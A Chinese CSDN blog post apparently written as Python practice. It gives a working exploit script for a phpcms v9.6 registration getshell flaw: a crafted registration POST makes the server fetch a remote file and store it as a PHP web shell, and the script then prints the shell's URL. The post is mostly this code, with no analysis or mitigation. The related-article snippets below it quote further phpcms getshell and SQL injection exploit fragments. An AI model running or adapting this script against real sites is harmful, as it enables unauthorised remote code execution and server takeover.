python学习之phpcms exp编写

最新推荐文章于 2021-09-20 17:38:15 发布
最新推荐文章于 2021-09-20 17:38:15 发布
阅读量458 收藏 1
点赞数 1
分类专栏: python学习 文章标签: exp编写
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ws13129/article/details/90640876
版权

python学习之phpcms exp编写

针对phpcms v9.6 前台注册getshell exp编写,漏洞分析请查看网上分析,不再赘述。

# -*- coding:utf-8 -*-
import re
import string

import requests
import random
import time




def getshell(host):
    try:
       # print("开始检测漏洞文件是否存在")
        time.sleep(5)
        header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 \
                                    (KHTML, like Gecko) Chrome/51.0.    2704.103 Safari/537.36"}
        ran=""
        for _ in range(8):
            ran = ran + random.choice('0123456789zyxwvutsrqponmlkjihgfedcba')
        url = host+'/index.php?m=member&c=index&a=register&siteid=1'
        if(requests.get(url,header).status_code==200):
            print("漏洞文件存在")
            time.sleep(1)
            print("开始进行漏洞验证")
            time.sleep(5)
            headers = {
            'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',

            'Accept-Encoding':'gzip, deflate',

            'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',

            'Upgrade-Insecure-Requests':'1',

            'Content-Type': 'application/x-www-form-urlencoded',

            'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'}

            data = "siteid=1&modelid=11&username="+ran+"&password=1123456&email="+ran+"@qq.com&info[content]=src=http://127.0.0.1/1.txt?.php#.jpg&dosubmit=1&protocol="

            s = requests.post(url=url,headers=headers,data=data)

            s = str(s.content)

            shell = re.findall(r'\'src=(.*?)\\\'', s)

            print("攻击成功,请访问: \n"+shell[0])

        else:
            print("检测完毕,漏洞文件不存在!!!")
    except:
        print ("requests error")



if __name__ == '__main__':
    getshell("http://www.phpcms.kk")

不要问我为什么加延迟,因为逼格高

cxk331
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python编写EXP/POC速成小记
U_U520的博客
02-22 1901
find() 方法检测字符串中是否包含子字符串 str ,如果指定 beg(开始) 和 end(结束) 范围,则检查是否包含在指定范围内,如果包含子字符串返回开始的索引值,否则返回-1。上述脚本存在误报,就是payload只有一个单引号闭合,没办法检验数字型sql,双引号型,’)型,’))等在payload中多加几个类型,可以直接导入自己的FUZZ字典。漏洞刚被批漏之后,有时候现有的工具里面是没有相应的EXP的,那我们可以根据原理写出对应的EXP代码,验证漏洞是否存在。不然会出现报错不适用。
python学习exp整合
cxk
06-10 960
python学习exp整合 将上述的三个exp利用脚本整合为一个,简单的cms漏洞识别利用功能 使用方法 python demo.py "url" # -*- coding:utf-8 -*- import urllib import urllib.request import requests import os import hashlib #import test.py import ...
phpcms V9 getshell exp
收集盒 Book box
01-03 1093
转自法克 http://xx.f4ck.net/thread-5248-1-1.html #!usr/bin/php -w';$aspshell='eval request("'.$pass.'")%>'; if($js==1){ $file="1.asp;1.jpg"; $ret=GetShell ($url,$aspshell,$file);
linux phpcms,PHPCMS任意文件下载之exp编写
weixin_31185473的博客
05-25 166
导读学习编写漏洞利用exp,其实原理很简单,就是模拟人工操作。利用代码将漏洞步骤一步步展现出来,今天我们就来和大家一起学习如何编写你自己的exp实验工具:firefox,burp,phpcms9.6.0实验语言:Python3.4实验环境:php+mysql+apache首先我们先来看看今天的phpcms任意文件下载漏洞复现步骤这里可以建议大家去看下phpcms任意文件下载代码审计的思路流程。然后...
phpcms v9.6.0版本getshell测试
黑面狐
09-09 4867
其实这个漏洞是4月初的时候了。 今天有空重新记录一下。 一、环境搭建: 需要 phpcms V9.6.0安装包/ phpstudy 安装PHPstudy完成后,直接把phpcms V9.6.0解压到WWW目录下 然后浏览器访问:http://ip/phpcms 进行安装,安装都是傻瓜式的操作,填写好数据库用户名密码就可以了。。phpstudy的mysql数据库root密码默认为root
phpcms模块开发之swfupload的使用介绍
10-27
本篇文章介绍了,phpcms模块开发之swfupload的使用分析,需要的朋友参考下
PHPCMS二次开发之表单类使用指南
09-29
phpcms v9 的系统类库有一个表单类,它封装了表单的一些组件,如编辑器、图片上传、时间选择器、模板选 择器等,更详细请参考form.class.php。有了这些组件,在对phpcms v9进行二次开发时,更加省时省心。
CMS建站之PHPCMS
06-09
CMS的知识点讲解,从浅入深,带您进入CMS建站的世界。帮助你搭建企业及资讯门户网站。循序渐进,对各个CMS从基本功能到商业实战。
phpcms学习资源包
07-27
phpcms是一套开源的php框架,可让你轻松帮助你完成一个网站。
Python----POC到EXP(requests模块、python脚本实现布尔盲注、延时注入)
Pluto.的博客
12-27 2330
文章目录Python一、编写EXP1. requests模块- 概述- 支持HTTP的方法- requests使用HTTP方法- 参数- 对象对应的方法2. 快速开始3. 相关操作- 定制头部- 超时- GET传参- POST传参- 上传文件- 重定向- cookie4. py脚本实现布尔盲注5. py脚本实现延时注入- sys.argv[ ] Python 一、编写EXP EXP是漏洞利用工具; 基础环境Python3,核心模块requests。 1. requests模块 - 概述 requests
Python exp() 函数
MTbaby的博客
11-29 1万+
Python exp() 函数描述exp() 函数返回 x 的指数,exe^x语法import math math.exp(x)注意:exp() 是不能直接访问的,需导入 math 模块,通过静态对象调用该方法。参数 x 数值表达式 返回值返回 x 的指数 exe^x实例# -*- coding: UTF-8 -*- import math # 导入 math 模块print "math.exp
php v9 sql,phpcmsv9最新高危sql注入exp
weixin_35545345的博客
03-17 229
获取当前数据库http://192.168.1.139:8080/phpcms/index.php?m=member&c=index&a=loginpost:forward=http%253A%252F%252F192.168.1.139%253A8080%252Fphpcms%252Findex.php%253Fm%253Dmember&username=phpcms&a...
exp编写小技巧
m0_49959202的博客
09-20 2844
文章目录exp编写小技巧1.代码对齐2. 填充为指定长度3. 链接远程服务器或者链接本地文件4. 格式转换5. 环境变量6. 获得汇编指令的机器代码7. 把权限交给用户8. shellcode9. ELF 操作ELF文件的工具11.接收数据12.发送数据13.填充字符,字符串向右/向左填充14.寻找ROP15.使用flat()函数来格式化payload16.gdb调试exp17.泄露libc常用函数18.获取libc版本方法19.寻找文件中字符串20.栈溢出确定偏移量方法20.1 方法一:gdb手工计算20
编写poc和exploit的几款常用工具介绍
koozxcv的博客
06-12 1万+
1.pwntools pwntools是一个CTF框架和漏洞利用开发库,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit。 pwntools对Ubuntu 12.04和14.04的支持最好,但是绝大多数的功能也支持Debian, Arch, FreeBSD, OSX, 等等。 sudo pip install pwntools即可安装
简单的Poc Exp编写(上)
dfdhxb995397的博客
05-26 1052
简单的POC EXP编写(上) 作者BY Greekn 今天主要讲的是关于web方面的poc编写 关于web安全个人理解的话 一个就是攻击另一个就是漏洞挖掘了防御的话看自己的经验了 攻击的话不管自己黑的漫天飞也是利用别人的工具或者漏洞罢了 这样只会攻击的话我们是学不会指哪打哪的所以我们就需要掌握漏洞...
python学习之ecshop exp编写
cxk
06-04 490
python学习之ecshop exp编写 针对ecshop 2.x,漏洞分析请查看网上分析,不再赘述。 # -*- coding:utf-8 -*- import requests import time def ecshop(url): time.sleep(5) url_exp=url+"/user.php" a = "554fcae493e564ee0dc7...
exp编写笔记
qq_42863961的博客
08-19 326
能帮到你的话,就给个赞吧 ???? python2 -c “print ‘A’*44 + ‘\x59\x86\x04\x08’” | ./ret2win32:python2 -c 是执行代码。| :管道
.exp是什么文件格式
热门推荐
PengPengBlog的博客
08-18 1万+
exp文件是指导出库文件的文件,简称导出库文件,它包含了导出函数和数据项的信息。当LIB创建一个导入库,同时它也创建一个导出库文件。如果你的程序链接到另一个程序,并且你的程序需要同时导出和导入到另一个程序中,这个时候就要使用到exp文件
phpcms v9编写一个查询文章的接口
最新发布
05-30
2. 在文件中编写代码,连接到PHPcms v9的数据库,并查询文章信息。可以使用PHPcms v9自带的Model类来实现查询。 示例代码如下: ```php require_once 'phpcms/base.php'; // 导入PHPcms的基础文件 // 连接数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值